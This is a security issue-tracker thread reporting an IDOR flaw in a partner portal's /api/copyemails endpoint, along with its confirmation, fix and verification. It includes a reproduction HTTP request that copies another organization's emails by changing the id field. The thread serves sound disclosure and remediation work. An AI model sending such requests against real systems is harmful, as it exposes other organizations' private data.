### ISSUE TITLE
SEC-4926 - IDOR via /api/copyemails allows to copy emails from other organizations

### ISSUE THREAD

**Issue by prashantjadhav92** [MindMatrix/SecurityTracker#127]
IDOR via  /api/copyemails  allows to copy emails from other organizations

Steps to reproduce:
Send the following request with id set to email from another organization. See that it was copied to your current organization and data is accessible

POST /api/copyemails HTTP/2
Host: partners.acronis.com
Cookie: [COOKIES]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Csrf-Token: [CSRF_TOKEN]
X-Requested-With: XMLHttpRequest
Content-Length: 14
Origin: https://partners.acronis.com
Referer: https://partners.acronis.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers {"id":[EMAIL_ID_YOU_WANNA_COPY]}

Fix: it must not be possible to access data of other organizations

**Comment by IshantRevclerx** [comment]
@shaileshtayde Sir, I have checked above mentioned security issue and user can copy emails of other organization's user by following the above mentioned steps.

User Name : puneet security
Company Name : Automation Testers

**Comment by shivmishra** [comment]
should be fixed here https://github.com/MindMatrix/AMP/pull/51803

**Comment by PuneetRevclerx** [comment]
@shivmishra sir, @sunrao sir, I have checked the above security issue and basic functionality on the given branch (https://pr-51803.dvl.amp.vg/) and it's working as expected now.

**Comment by PuneetRevclerx** [comment]
@prashantjadhav92 sir, I have checked above security issue on Acronis production and it's working as expected now.

**Comment by prashantjadhav92** [comment]
I have asked the client to verify the same.

**Comment by prashantjadhav92** [comment]
Verified by the client.
